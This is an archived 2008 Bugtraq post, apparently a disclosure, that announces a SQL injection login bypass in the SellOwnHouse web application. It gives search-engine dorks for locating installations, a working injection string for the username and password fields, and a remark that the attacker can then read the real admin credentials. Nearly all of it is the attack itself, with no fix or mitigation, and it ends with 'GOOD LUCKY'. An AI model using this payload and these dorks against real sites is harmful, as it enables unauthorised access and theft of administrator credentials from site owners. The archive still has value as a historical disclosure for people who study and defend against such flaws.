
Date: 13 Feb 2008 16:26:22 -0000
From: hackturkiye.hackturkiye@...il.com
To: bugtraq@...urityfocus.com
Subject: SellOwnHouse login SQL Injection

 #########################################################################
#  
#  SellOwnHouse login SQL Injection
#  
######################################################################### 
#
# AUTHOR : S@BUN 
#
# HOME : http://www.hackturkiye.com/ 

#########################################################################

  DORK 1 : "2008 SellOwnHouse"

  DORK 2 : "2007 SellOwnHouse"
 
#########################################################################
# EXPLOIT : 
#
# Username: anything' OR 'x'='x
#
# Password: anything' OR 'x'='x 
# 
# later attacker can see real admin name and pass in Edit Your Account
#
#
#########################################################################
# S@BUN   www.hackturkiye.com     S@BUN           #########################################################################
#########################################################################
# S@BUN           GOOD LUCKY          S@BUN 
#########################################################################
